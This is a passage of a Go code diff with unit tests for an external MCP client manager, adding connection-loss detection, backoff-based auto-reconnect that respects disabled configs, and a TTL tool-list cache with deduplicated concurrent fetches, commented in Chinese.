{"wrapped eof", fmt.Errorf("connection closed: %w", io.EOF), true},
|
||||||
|
{"client closing", errors.New(`calling "tools/list": client is closing: EOF`), true},
|
||||||
|
{"connection reset", errors.New("read tcp: connection reset by peer"), true},
|
||||||
|
{"canceled", context.Canceled, false},
|
||||||
|
{"deadline", context.DeadlineExceeded, false},
|
||||||
|
{"other", errors.New("invalid params"), false},
|
||||||
|
}
|
||||||
|
for _, tc := range cases {
|
||||||
|
tc := tc
|
||||||
|
t.Run(tc.name, func(t *testing.T) {
|
||||||
|
t.Parallel()
|
||||||
|
if got := isConnectionDeadError(tc.err); got != tc.want {
|
||||||
|
t.Fatalf("isConnectionDeadError(%v) = %v, want %v", tc.err, got, tc.want)
|
||||||
|
}
|
||||||
|
})
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestLazySDKClient_MarkDisconnected(t *testing.T) {
|
||||||
|
c := &lazySDKClient{status: "connected"}
|
||||||
|
c.inner = &sdkClient{status: "connected"}
|
||||||
|
c.markDisconnected()
|
||||||
|
if c.IsConnected() {
|
||||||
|
t.Fatal("expected disconnected after markDisconnected")
|
||||||
|
}
|
||||||
|
if c.GetStatus() != "disconnected" {
|
||||||
|
t.Fatalf("expected status disconnected, got %s", c.GetStatus())
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestHandleConnectionDead_MarksLazyClientDisconnected(t *testing.T) {
|
||||||
|
logger := zap.NewNop()
|
||||||
|
m := NewExternalMCPManager(logger)
|
||||||
|
|
||||||
|
name := "dead-mcp"
|
||||||
|
cfg := config.ExternalMCPServerConfig{
|
||||||
|
Type: "http",
|
||||||
|
URL: "http://example.com/mcp",
|
||||||
|
ExternalMCPEnable: true,
|
||||||
|
}
|
||||||
|
m.mu.Lock()
|
||||||
|
m.configs[name] = cfg
|
||||||
|
client := newLazySDKClient(cfg, logger)
|
||||||
|
client.inner = &sdkClient{status: "connected"}
|
||||||
|
client.status = "connected"
|
||||||
|
m.clients[name] = client
|
||||||
|
m.mu.Unlock()
|
||||||
|
|
||||||
|
deadErr := errors.New(`connection closed: calling "tools/list": client is closing: EOF`)
|
||||||
|
m.handleConnectionDead(name, client, deadErr)
|
||||||
|
|
||||||
|
if client.IsConnected() {
|
||||||
|
t.Fatal("expected disconnected after handleConnectionDead")
|
||||||
|
}
|
||||||
|
if m.GetError(name) == "" {
|
||||||
|
t.Fatal("expected error message to be recorded")
|
||||||
|
}
|
||||||
|
counts := m.GetToolCounts()
|
||||||
|
if counts[name] != 0 {
|
||||||
|
t.Fatalf("expected tool count 0 after disconnect, got %d", counts[name])
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestReconnectBackoff(t *testing.T) {
|
||||||
|
t.Parallel()
|
||||||
|
if d := (&ExternalMCPManager{}).reconnectBackoff(0); d != 0 {
|
||||||
|
t.Fatalf("attempt 0: got %v", d)
|
||||||
|
}
|
||||||
|
if d := (&ExternalMCPManager{}).reconnectBackoff(1); d != externalReconnectMinInterval {
|
||||||
|
t.Fatalf("attempt 1: got %v", d)
|
||||||
|
}
|
||||||
|
if d := (&ExternalMCPManager{}).reconnectBackoff(10); d != externalReconnectMaxBackoff {
|
||||||
|
t.Fatalf("attempt 10: got %v, want cap %v", d, externalReconnectMaxBackoff)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestTryReconnect_RateLimited(t *testing.T) {
|
||||||
|
logger := zap.NewNop()
|
||||||
|
m := NewExternalMCPManager(logger)
|
||||||
|
|
||||||
|
name := "rate-limited"
|
||||||
|
m.reconnectMu.Lock()
|
||||||
|
m.reconnectLastTry[name] = time.Now()
|
||||||
|
m.reconnectAttempts[name] = 2
|
||||||
|
m.reconnectMu.Unlock()
|
||||||
|
|
||||||
|
m.tryReconnect(name)
|
||||||
|
|
||||||
|
m.reconnectMu.Lock()
|
||||||
|
attempts := m.reconnectAttempts[name]
|
||||||
|
m.reconnectMu.Unlock()
|
||||||
|
if attempts != 2 {
|
||||||
|
t.Fatalf("rate limited reconnect should not increment attempts, got %d", attempts)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestTryReconnect_SkipsWhenDisabled(t *testing.T) {
|
||||||
|
logger := zap.NewNop()
|
||||||
|
m := NewExternalMCPManager(logger)
|
||||||
|
|
||||||
|
name := "disabled-mcp"
|
||||||
|
m.mu.Lock()
|
||||||
|
m.configs[name] = config.ExternalMCPServerConfig{
|
||||||
|
Type: "http",
|
||||||
|
URL: "http://example.com/mcp",
|
||||||
|
ExternalMCPEnable: false,
|
||||||
|
}
|
||||||
|
m.mu.Unlock()
|
||||||
|
|
||||||
|
m.tryReconnect(name)
|
||||||
|
|
||||||
|
m.reconnectMu.Lock()
|
||||||
|
attempts := m.reconnectAttempts[name]
|
||||||
|
m.reconnectMu.Unlock()
|
||||||
|
if attempts != 0 {
|
||||||
|
t.Fatalf("disabled MCP should not increment reconnect attempts, got %d", attempts)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestTryReconnect_SkipsWhenConnecting(t *testing.T) {
|
||||||
|
logger := zap.NewNop()
|
||||||
|
m := NewExternalMCPManager(logger)
|
||||||
|
|
||||||
|
name := "connecting-mcp"
|
||||||
|
cfg := config.ExternalMCPServerConfig{
|
||||||
|
Type: "http",
|
||||||
|
URL: "http://example.com/mcp",
|
||||||
|
ExternalMCPEnable: true,
|
||||||
|
}
|
||||||
|
client := newLazySDKClient(cfg, logger)
|
||||||
|
client.setStatus("connecting")
|
||||||
|
|
||||||
|
m.mu.Lock()
|
||||||
|
m.configs[name] = cfg
|
||||||
|
m.clients[name] = client
|
||||||
|
m.mu.Unlock()
|
||||||
|
|
||||||
|
m.tryReconnect(name)
|
||||||
|
|
||||||
|
m.reconnectMu.Lock()
|
||||||
|
attempts := m.reconnectAttempts[name]
|
||||||
|
m.reconnectMu.Unlock()
|
||||||
|
if attempts != 0 {
|
||||||
|
t.Fatalf("connecting MCP should not increment reconnect attempts, got %d", attempts)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestStartClientAutoReconnect_SkipsWhenDisabled(t *testing.T) {
|
||||||
|
logger := zap.NewNop()
|
||||||
|
m := NewExternalMCPManager(logger)
|
||||||
|
m.stopRefresh = make(chan struct{})
|
||||||
|
|
||||||
|
name := "stopped"
|
||||||
|
m.mu.Lock()
|
||||||
|
m.configs[name] = config.ExternalMCPServerConfig{
|
||||||
|
Type: "http",
|
||||||
|
URL: "http://example.com/mcp",
|
||||||
|
ExternalMCPEnable: false,
|
||||||
|
}
|
||||||
|
m.mu.Unlock()
|
||||||
|
|
||||||
|
if err := m.startClient(name, true); err != nil {
|
||||||
|
t.Fatalf("startClient: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
m.mu.RLock()
|
||||||
|
cfg := m.configs[name]
|
||||||
|
_, hasClient := m.clients[name]
|
||||||
|
m.mu.RUnlock()
|
||||||
|
if cfg.ExternalMCPEnable {
|
||||||
|
t.Fatal("auto reconnect should not enable stopped MCP")
|
||||||
|
}
|
||||||
|
if hasClient {
|
||||||
|
t.Fatal("auto reconnect should not create client when disabled")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestOnClientConnected_ClearsReconnectState(t *testing.T) {
|
||||||
|
m := &ExternalMCPManager{
|
||||||
|
reconnectAttempts: map[string]int{"x": 3},
|
||||||
|
reconnectLastTry: map[string]time.Time{"x": time.Now()},
|
||||||
|
reconnecting: map[string]bool{"x": true},
|
||||||
|
}
|
||||||
|
m.onClientConnected("x")
|
||||||
|
|
||||||
|
m.reconnectMu.Lock()
|
||||||
|
defer m.reconnectMu.Unlock()
|
||||||
|
if len(m.reconnectAttempts) != 0 || len(m.reconnectLastTry) != 0 || len(m.reconnecting) != 0 {
|
||||||
|
t.Fatal("expected reconnect state cleared")
|
||||||
|
}
|
||||||
|
}
|
||||||
@@ -15,6 +15,26 @@ import (
|
|||||||
"go.uber.org/zap"
|
"go.uber.org/zap"
|
||||||
)
|
)
|
||||||
|
|
||||||
|
const (
|
||||||
|
// externalToolListCacheTTL 已连接外部 MCP 的工具列表缓存有效期,避免每次 API 请求都打远程 ListTools。
|
||||||
|
externalToolListCacheTTL = 60 * time.Second
|
||||||
|
// externalToolCountRefreshInterval 后台刷新工具数量的间隔(仅刷新缓存过期或缺失的客户端)。
|
||||||
|
externalToolCountRefreshInterval = 60 * time.Second
|
||||||
|
)
|
||||||
|
|
||||||
|
// toolListCacheEntry 外部 MCP 工具列表缓存条目
|
||||||
|
type toolListCacheEntry struct {
|
||||||
|
tools []Tool
|
||||||
|
updatedAt time.Time
|
||||||
|
}
|
||||||
|
|
||||||
|
// listToolsInflight 合并同一 MCP 上并发的 ListTools 请求
|
||||||
|
type listToolsInflight struct {
|
||||||
|
done chan struct{}
|
||||||
|
tools []Tool
|
||||||
|
err error
|
||||||
|
}
|
||||||
|
|
||||||
// ExternalMCPManager 外部MCP管理器
|
// ExternalMCPManager 外部MCP管理器
|
||||||
type ExternalMCPManager struct {
|
type ExternalMCPManager struct {
|
||||||
clients map[string]ExternalMCPClient
|
clients map[string]ExternalMCPClient
|
||||||
@@ -26,14 +46,20 @@ type ExternalMCPManager struct {
|
|||||||
errors map[string]string // 错误信息
|
errors map[string]string // 错误信息
|
||||||
toolCounts map[string]int // 工具数量缓存
|
toolCounts map[string]int // 工具数量缓存
|
||||||
toolCountsMu sync.RWMutex // 工具数量缓存的锁
|
toolCountsMu sync.RWMutex // 工具数量缓存的锁
|
||||||
toolCache map[string][]Tool // 工具列表缓存:MCP名称 -> 工具列表
|
toolCache map[string]toolListCacheEntry // 工具列表缓存:MCP名称 -> 工具列表
|
||||||
toolCacheMu sync.RWMutex // 工具列表缓存的锁
|
toolCacheMu sync.RWMutex // 工具列表缓存的锁
|
||||||
|
listToolsMu sync.Mutex
|
||||||
|
listToolsInflight map[string]*listToolsInflight
|
||||||
stopRefresh chan struct{} // 停止后台刷新的信号
|
stopRefresh chan struct{} // 停止后台刷新的信号
|
||||||
refreshWg sync.WaitGroup // 等待后台刷新goroutine完成
|
refreshWg sync.WaitGroup // 等待后台刷新goroutine完成
|
||||||
refreshing atomic.Bool // 防止 refreshToolCounts 并发堆积
|
refreshing atomic.Bool // 防止 refreshToolCounts 并发堆积
|
||||||
mu sync.RWMutex
|
mu sync.RWMutex
|
||||||
runningCancels map[string]context.CancelFunc
|
runningCancels map[string]context.CancelFunc
|
||||||
abortUserNotes map[string]string
|
abortUserNotes map[string]string
|
||||||
|
reconnectMu sync.Mutex
|
||||||
|
reconnecting map[string]bool
|
||||||
|
reconnectLastTry map[string]time.Time
|
||||||
|
reconnectAttempts map[string]int
|
||||||
}
|
}
|
||||||
|
|
||||||
// NewExternalMCPManager 创建外部MCP管理器
|
// NewExternalMCPManager 创建外部MCP管理器
|
||||||
@@ -51,11 +77,15 @@ func NewExternalMCPManagerWithStorage(logger *zap.Logger, storage MonitorStorage
|
|||||||
executions: make(map[string]*ToolExecution),
|
executions: make(map[string]*ToolExecution),
|
||||||
stats: make(map[string]*ToolStats),
|
stats: make(map[string]*ToolStats),
|
||||||
errors: make(map[string]string),
|
errors: make(map[string]string),
|
||||||
toolCounts: make(map[string]int),
|
toolCounts: make(map[string]int),
|
||||||
toolCache: make(map[string][]Tool),
|
toolCache: make(map[string]toolListCacheEntry),
|
||||||
stopRefresh: make(chan struct{}),
|
listToolsInflight: make(map[string]*listToolsInflight),
|
||||||
runningCancels: make(map[string]context.CancelFunc),
|
stopRefresh: make(chan struct{}),
|
||||||
abortUserNotes: make(map[string]string),
|
runningCancels: make(map[string]context.CancelFunc),
|
||||||
|
abortUserNotes: make(map[string]string),
|
||||||
|
reconnecting: make(map[string]bool),
|
||||||
|
reconnectLastTry: make(map[string]time.Time),
|
||||||
|
reconnectAttempts: make(map[string]int),
|
||||||
}
|
}
|
||||||
// 启动后台刷新工具数量的goroutine
|
// 启动后台刷新工具数量的goroutine
|
||||||
manager.startToolCountRefresh()
|
manager.startToolCountRefresh()
|
||||||
@@ -122,6 +152,7 @@ func (m *ExternalMCPManager) RemoveConfig(name string) error {
|
|||||||
}
|
}
|
||||||
|
|
||||||
delete(m.configs, name)
|
delete(m.configs, name)
|
||||||
|
m.clearReconnectState(name)
|
||||||
|
|
||||||
// 清理工具数量缓存
|
// 清理工具数量缓存
|
||||||
m.toolCountsMu.Lock()
|
m.toolCountsMu.Lock()
|
||||||
@@ -136,8 +167,13 @@ func (m *ExternalMCPManager) RemoveConfig(name string) error {
|
|||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
|
|
||||||
// StartClient 启动客户端
|
// StartClient 启动客户端(用户手动启动;连接失败不自动重试)
|
||||||
func (m *ExternalMCPManager) StartClient(name string) error {
|
func (m *ExternalMCPManager) StartClient(name string) error {
|
||||||
|
return m.startClient(name, false)
|
||||||
|
}
|
||||||
|
|
||||||
|
// startClient 启动客户端。autoReconnect 为 true 时用于断连自愈:尊重停用状态,失败后按退避继续重试。
|
||||||
|
func (m *ExternalMCPManager) startClient(name string, autoReconnect bool) error {
|
||||||
m.mu.Lock()
|
m.mu.Lock()
|
||||||
serverCfg, exists := m.configs[name]
|
serverCfg, exists := m.configs[name]
|
||||||
m.mu.Unlock()
|
m.mu.Unlock()
|
||||||
@@ -146,6 +182,10 @@ func (m *ExternalMCPManager) StartClient(name string) error {
|
|||||||
return fmt.Errorf("配置不存在: %s", name)
|
return fmt.Errorf("配置不存在: %s", name)
|
||||||
}
|
}
|
||||||
|
|
||||||
|
if autoReconnect && !m.isEnabled(serverCfg) {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
// 检查是否已经有连接的客户端
|
// 检查是否已经有连接的客户端
|
||||||
m.mu.RLock()
|
m.mu.RLock()
|
||||||
existingClient, hasClient := m.clients[name]
|
existingClient, hasClient := m.clients[name]
|
||||||
@@ -155,11 +195,12 @@ func (m *ExternalMCPManager) StartClient(name string) error {
|
|||||||
// 检查客户端是否已连接
|
// 检查客户端是否已连接
|
||||||
if existingClient.IsConnected() {
|
if existingClient.IsConnected() {
|
||||||
// 客户端已连接,直接返回成功(目标状态已达成)
|
// 客户端已连接,直接返回成功(目标状态已达成)
|
||||||
// 更新配置为启用(确保配置一致)
|
if !autoReconnect {
|
||||||
m.mu.Lock()
|
m.mu.Lock()
|
||||||
serverCfg.ExternalMCPEnable = true
|
serverCfg.ExternalMCPEnable = true
|
||||||
m.configs[name] = serverCfg
|
m.configs[name] = serverCfg
|
||||||
m.mu.Unlock()
|
m.mu.Unlock()
|
||||||
|
}
|
||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
// 如果有客户端但未连接,先关闭
|
// 如果有客户端但未连接,先关闭
|
||||||
@@ -169,6 +210,16 @@ func (m *ExternalMCPManager) StartClient(name string) error {
|
|||||||
m.mu.Unlock()
|
m.mu.Unlock()
|
||||||
}
|
}
|
||||||
|
|
||||||
|
if autoReconnect {
|
||||||
|
m.mu.RLock()
|
||||||
|
serverCfg, exists = m.configs[name]
|
||||||
|
enabled := exists && m.isEnabled(serverCfg)
|
||||||
|
m.mu.RUnlock()
|
||||||
|
if !enabled {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
// 更新配置为启用
|
// 更新配置为启用
|
||||||
m.mu.Lock()
|
m.mu.Lock()
|
||||||
serverCfg.ExternalMCPEnable = true
|
serverCfg.ExternalMCPEnable = true
|
||||||
@@ -192,10 +243,11 @@ func (m *ExternalMCPManager) StartClient(name string) error {
|
|||||||
m.mu.Unlock()
|
m.mu.Unlock()
|
||||||
|
|
||||||
// 在后台异步进行实际连接
|
// 在后台异步进行实际连接
|
||||||
go func() {
|
go func(reconnect bool) {
|
||||||
if err := m.doConnect(name, serverCfg, client); err != nil {
|
if err := m.doConnect(name, serverCfg, client); err != nil {
|
||||||
m.logger.Error("连接外部MCP客户端失败",
|
m.logger.Error("连接外部MCP客户端失败",
|
||||||
zap.String("name", name),
|
zap.String("name", name),
|
||||||
|
zap.Bool("auto_reconnect", reconnect),
|
||||||
zap.Error(err),
|
zap.Error(err),
|
||||||
)
|
)
|
||||||
// 连接失败,设置状态为error并保存错误信息
|
// 连接失败,设置状态为error并保存错误信息
|
||||||
@@ -205,22 +257,19 @@ func (m *ExternalMCPManager) StartClient(name string) error {
|
|||||||
m.mu.Unlock()
|
m.mu.Unlock()
|
||||||
// 触发工具数量刷新(连接失败,工具数量应为0)
|
// 触发工具数量刷新(连接失败,工具数量应为0)
|
||||||
m.triggerToolCountRefresh()
|
m.triggerToolCountRefresh()
|
||||||
|
if reconnect {
|
||||||
|
m.scheduleReconnectAfterFailure(name)
|
||||||
|
}
|
||||||
} else {
|
} else {
|
||||||
// 连接成功,清除错误信息
|
// 连接成功,清除错误信息
|
||||||
m.mu.Lock()
|
m.mu.Lock()
|
||||||
delete(m.errors, name)
|
delete(m.errors, name)
|
||||||
m.mu.Unlock()
|
m.mu.Unlock()
|
||||||
// 立即刷新工具数量和工具列表缓存
|
m.onClientConnected(name)
|
||||||
m.triggerToolCountRefresh()
|
// 异步拉取工具列表(singleflight 去重,结果同时写入 toolCache 与 toolCounts)
|
||||||
m.refreshToolCache(name, client)
|
go m.refreshToolCache(name, client)
|
||||||
// 2 秒后再刷新一次,覆盖 SSE/Streamable 等需稍等就绪的远端
|
|
||||||
go func() {
|
|
||||||
time.Sleep(2 * time.Second)
|
|
||||||
m.triggerToolCountRefresh()
|
|
||||||
m.refreshToolCache(name, client)
|
|
||||||
}()
|
|
||||||
}
|
}
|
||||||
}()
|
}(autoReconnect)
|
||||||
|
|
||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
@@ -249,10 +298,16 @@ func (m *ExternalMCPManager) StopClient(name string) error {
|
|||||||
m.toolCounts[name] = 0
|
m.toolCounts[name] = 0
|
||||||
m.toolCountsMu.Unlock()
|
m.toolCountsMu.Unlock()
|
||||||
|
|
||||||
|
m.toolCacheMu.Lock()
|
||||||
|
delete(m.toolCache, name)
|
||||||
|
m.toolCacheMu.Unlock()
|
||||||
|
|
||||||
// 更新配置为禁用
|
// 更新配置为禁用
|
||||||
serverCfg.ExternalMCPEnable = false
|
serverCfg.ExternalMCPEnable = false
|
||||||
m.configs[name] = serverCfg
|
m.configs[name] = serverCfg
|
||||||
|
|
||||||
|
m.clearReconnectState(name)
|
||||||
|
|
||||||
return nil
|
return nil
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -335,16 +390,19 @@ func (m *ExternalMCPManager) getToolsForClient(name string, client ExternalMCPCl
|
|||||||
return nil, fmt.Errorf("外部MCP连接失败: %s", name)
|
return nil, fmt.Errorf("外部MCP连接失败: %s", name)
|
||||||
}
|
}
|
||||||
|
|
||||||
// 已连接:尝试获取最新工具列表
|
// 已连接:缓存优先,仅在缺失或过期时打远程 ListTools
|
||||||
if client.IsConnected() {
|
if client.IsConnected() {
|
||||||
tools, err := client.ListTools(ctx)
|
if tools, ok := m.getFreshCachedTools(name); ok {
|
||||||
|
return tools, nil
|
||||||
|
}
|
||||||
|
if tools, ok := m.getAnyCachedTools(name); ok {
|
||||||
|
m.triggerToolListRefresh(name, client)
|
||||||
|
return tools, nil
|
||||||
|
}
|
||||||
|
tools, err := m.listToolsDeduped(ctx, name, client)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
// 获取失败,尝试使用缓存
|
|
||||||
return m.getCachedTools(name, "连接正常但获取失败", err)
|
return m.getCachedTools(name, "连接正常但获取失败", err)
|
||||||
}
|
}
|
||||||
|
|
||||||
// 获取成功,更新缓存
|
|
||||||
m.updateToolCache(name, tools)
|
|
||||||
return tools, nil
|
return tools, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
@@ -361,37 +419,127 @@ func (m *ExternalMCPManager) getToolsForClient(name string, client ExternalMCPCl
|
|||||||
return nil, fmt.Errorf("外部MCP状态未知: %s (状态: %s)", name, status)
|
return nil, fmt.Errorf("外部MCP状态未知: %s (状态: %s)", name, status)
|
||||||
}
|
}
|
||||||
|
|
||||||
// getCachedTools 获取缓存的工具列表
|
// getCachedTools 获取缓存的工具列表(含空列表缓存)
|
||||||
func (m *ExternalMCPManager) getCachedTools(name, reason string, originalErr error) ([]Tool, error) {
|
func (m *ExternalMCPManager) getCachedTools(name, reason string, originalErr error) ([]Tool, error) {
|
||||||
m.toolCacheMu.RLock()
|
if tools, ok := m.getAnyCachedTools(name); ok {
|
||||||
cachedTools, hasCache := m.toolCache[name]
|
|
||||||
m.toolCacheMu.RUnlock()
|
|
||||||
|
|
||||||
if hasCache && len(cachedTools) > 0 {
|
|
||||||
m.logger.Debug("使用缓存的工具列表",
|
m.logger.Debug("使用缓存的工具列表",
|
||||||
zap.String("name", name),
|
zap.String("name", name),
|
||||||
zap.String("reason", reason),
|
zap.String("reason", reason),
|
||||||
zap.Int("count", len(cachedTools)),
|
zap.Int("count", len(tools)),
|
||||||
zap.Error(originalErr),
|
zap.Error(originalErr),
|
||||||
)
|
)
|
||||||
return cachedTools, nil
|
return tools, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
// 无缓存,返回错误
|
|
||||||
if originalErr != nil {
|
if originalErr != nil {
|
||||||
return nil, fmt.Errorf("获取外部MCP工具失败且无缓存: %w", originalErr)
|
return nil, fmt.Errorf("获取外部MCP工具失败且无缓存: %w", originalErr)
|
||||||
}
|
}
|
||||||
return nil, fmt.Errorf("外部MCP无缓存工具: %s", name)
|
return nil, fmt.Errorf("外部MCP无缓存工具: %s", name)
|
||||||
}
|
}
|
||||||
|
|
||||||
// updateToolCache 更新工具列表缓存
|
func (m *ExternalMCPManager) isToolCacheFresh(updatedAt time.Time) bool {
|
||||||
func (m *ExternalMCPManager) updateToolCache(name string, tools []Tool) {
|
return !updatedAt.IsZero() && time.Since(updatedAt) < externalToolListCacheTTL
|
||||||
|
}
|
||||||
|
|
||||||
|
func cloneTools(tools []Tool) []Tool {
|
||||||
|
if len(tools) == 0 {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
out := make([]Tool, len(tools))
|
||||||
|
copy(out, tools)
|
||||||
|
return out
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *ExternalMCPManager) getFreshCachedTools(name string) ([]Tool, bool) {
|
||||||
|
m.toolCacheMu.RLock()
|
||||||
|
entry, ok := m.toolCache[name]
|
||||||
|
m.toolCacheMu.RUnlock()
|
||||||
|
if !ok || !m.isToolCacheFresh(entry.updatedAt) {
|
||||||
|
return nil, false
|
||||||
|
}
|
||||||
|
return cloneTools(entry.tools), true
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *ExternalMCPManager) getAnyCachedTools(name string) ([]Tool, bool) {
|
||||||
|
m.toolCacheMu.RLock()
|
||||||
|
entry, ok := m.toolCache[name]
|
||||||
|
m.toolCacheMu.RUnlock()
|
||||||
|
if !ok {
|
||||||
|
return nil, false
|
||||||
|
}
|
||||||
|
return cloneTools(entry.tools), true
|
||||||
|
}
|
||||||
|
|
||||||
|
// listToolsDeduped 对同一 MCP 合并并发 ListTools,并更新 toolCache / toolCounts。
|
||||||
|
func (m *ExternalMCPManager) listToolsDeduped(ctx context.Context, name string, client ExternalMCPClient) ([]Tool, error) {
|
||||||
|
m.listToolsMu.Lock()
|
||||||
|
if inflight, exists := m.listToolsInflight[name]; exists {
|
||||||
|
m.listToolsMu.Unlock()
|
||||||
|
select {
|
||||||
|
case <-inflight.done:
|
||||||
|
if inflight.err != nil {
|
||||||
|
return nil, inflight.err
|
||||||
|
}
|
||||||
|
return cloneTools(inflight.tools), nil
|
||||||
|
case <-ctx.Done():
|
||||||
|
return nil, ctx.Err()
|
||||||
|
}
|
||||||
|
}
|
||||||
|
inflight := &listToolsInflight{done: make(chan struct{})}
|
||||||
|
m.listToolsInflight[name] = inflight
|
||||||
|
m.listToolsMu.Unlock()
|
||||||
|
|
||||||
|
inflight.tools, inflight.err = client.ListTools(ctx)
|
||||||
|
if inflight.err == nil {
|
||||||
|
m.updateToolCache(name, inflight.tools)
|
||||||
|
}
|
||||||
|
|
||||||
|
m.listToolsMu.Lock()
|
||||||
|
delete(m.listToolsInflight, name)
|
||||||
|
close(inflight.done)
|
||||||
|
m.listToolsMu.Unlock()
|
||||||
|
|
||||||
|
if inflight.err != nil {
|
||||||
|
m.handleConnectionDead(name, client, inflight.err)
|
||||||
|
return nil, inflight.err
|
||||||
|
}
|
||||||
|
return cloneTools(inflight.tools), nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// InvalidateToolCache 清除指定外部 MCP 的工具列表缓存(手动刷新时使用)
|
||||||
|
func (m *ExternalMCPManager) InvalidateToolCache(name string) {
|
||||||
m.toolCacheMu.Lock()
|
m.toolCacheMu.Lock()
|
||||||
m.toolCache[name] = tools
|
delete(m.toolCache, name)
|
||||||
|
m.toolCacheMu.Unlock()
|
||||||
|
}
|
||||||
|
|
||||||
|
// InvalidateAllToolCaches 清除所有外部 MCP 工具列表缓存
|
||||||
|
func (m *ExternalMCPManager) InvalidateAllToolCaches() {
|
||||||
|
m.toolCacheMu.Lock()
|
||||||
|
m.toolCache = make(map[string]toolListCacheEntry)
|
||||||
|
m.toolCacheMu.Unlock()
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m *ExternalMCPManager) triggerToolListRefresh(name string, client ExternalMCPClient) {
|
||||||
|
go func() {
|
||||||
|
ctx, cancel := context.WithTimeout(context.Background(), 15*time.Second)
|
||||||
|
defer cancel()
|
||||||
|
_, _ = m.listToolsDeduped(ctx, name, client)
|
||||||
|
}()
|
||||||
|
}
|
||||||
|
|
||||||
|
// updateToolCache 更新工具列表缓存与工具数量
|
||||||
|
func (m *ExternalMCPManager) updateToolCache(name string, tools []Tool) {
|
||||||
|
stored := cloneTools(tools)
|
||||||
|
m.toolCacheMu.Lock()
|
||||||
|
m.toolCache[name] = toolListCacheEntry{tools: stored, updatedAt: time.Now()}
|
||||||
m.toolCacheMu.Unlock()
|
m.toolCacheMu.Unlock()
|
||||||
|
|
||||||
// 如果返回空列表,记录警告
|
m.toolCountsMu.Lock()
|
||||||
if len(tools) == 0 {
|
m.toolCounts[name] = len(stored)
|
||||||
|
m.toolCountsMu.Unlock()
|
||||||
|
|
||||||
|
if len(stored) == 0 {
|
||||||
m.logger.Warn("外部MCP返回空工具列表",
|
m.logger.Warn("外部MCP返回空工具列表",
|
||||||
zap.String("name", name),
|
zap.String("name", name),
|
||||||
zap.String("hint", "服务可能暂时不可用,工具列表为空"),
|
zap.String("hint", "服务可能暂时不可用,工具列表为空"),
|
||||||
@@ -399,7 +547,7 @@ func (m *ExternalMCPManager) updateToolCache(name string, tools []Tool) {
|
|||||||
} else {
|
} else {
|
||||||
m.logger.Debug("工具列表缓存已更新",
|
m.logger.Debug("工具列表缓存已更新",
|
||||||
zap.String("name", name),
|
zap.String("name", name),
|
||||||
zap.Int("count", len(tools)),
|
zap.Int("count", len(stored)),
|
||||||
)
|
)
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
@@ -467,6 +615,9 @@ func (m *ExternalMCPManager) CallTool(ctx context.Context, toolName string, args
|
|||||||
|
|
||||||
// 调用工具
|
// 调用工具
|
||||||
result, err := client.CallTool(execCtx, actualToolName, args)
|
result, err := client.CallTool(execCtx, actualToolName, args)
|
||||||
|
if err != nil {
|
||||||
|
m.handleConnectionDead(mcpName, client, err)
|
||||||
|
}
|
||||||
cancelledWithUserNote := m.applyAbortUserNoteToCancelledToolResult(executionID, &result, &err)
|
cancelledWithUserNote := m.applyAbortUserNoteToCancelledToolResult(executionID, &result, &err)
|
||||||
|
|
||||||
// 更新执行记录
|
// 更新执行记录
|
||||||
@@ -854,28 +1005,27 @@ func (m *ExternalMCPManager) refreshToolCounts() {
|
|||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
|
||||||
// 使用合理的超时时间(15秒),既能应对网络延迟,又不会过长阻塞
|
// 缓存仍新鲜时直接复用,避免与 GetAllTools 重复打远程
|
||||||
// 由于这是后台异步刷新,超时不会影响前端响应
|
if _, fresh := m.getFreshCachedTools(n); fresh {
|
||||||
|
m.toolCountsMu.RLock()
|
||||||
|
count := m.toolCounts[n]
|
||||||
|
m.toolCountsMu.RUnlock()
|
||||||
|
resultChan <- countResult{name: n, count: count}
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
ctx, cancel := context.WithTimeout(context.Background(), 15*time.Second)
|
ctx, cancel := context.WithTimeout(context.Background(), 15*time.Second)
|
||||||
tools, err := c.ListTools(ctx)
|
tools, err := m.listToolsDeduped(ctx, n, c)
|
||||||
cancel()
|
cancel()
|
||||||
|
|
||||||
if err != nil {
|
if err != nil {
|
||||||
errStr := err.Error()
|
if !isConnectionDeadError(err) {
|
||||||
// SSE 连接 EOF:远端可能关闭了流或未按规范在流上推送响应,仅首次用 Warn 提示
|
|
||||||
if strings.Contains(errStr, "EOF") || strings.Contains(errStr, "client is closing") {
|
|
||||||
m.logger.Warn("获取外部MCP工具数量失败(SSE 流已关闭或服务端未在流上返回 tools/list 响应)",
|
|
||||||
zap.String("name", n),
|
|
||||||
zap.String("hint", "若为 SSE 连接,请确认服务端保持 GET 流打开并按 MCP 规范以 event: message 推送 JSON-RPC 响应"),
|
|
||||||
zap.Error(err),
|
|
||||||
)
|
|
||||||
} else {
|
|
||||||
m.logger.Warn("获取外部MCP工具数量失败,请检查连接或服务端 tools/list",
|
m.logger.Warn("获取外部MCP工具数量失败,请检查连接或服务端 tools/list",
|
||||||
zap.String("name", n),
|
zap.String("name", n),
|
||||||
zap.Error(err),
|
zap.Error(err),
|
||||||
)
|
)
|
||||||
}
|
}
|
||||||
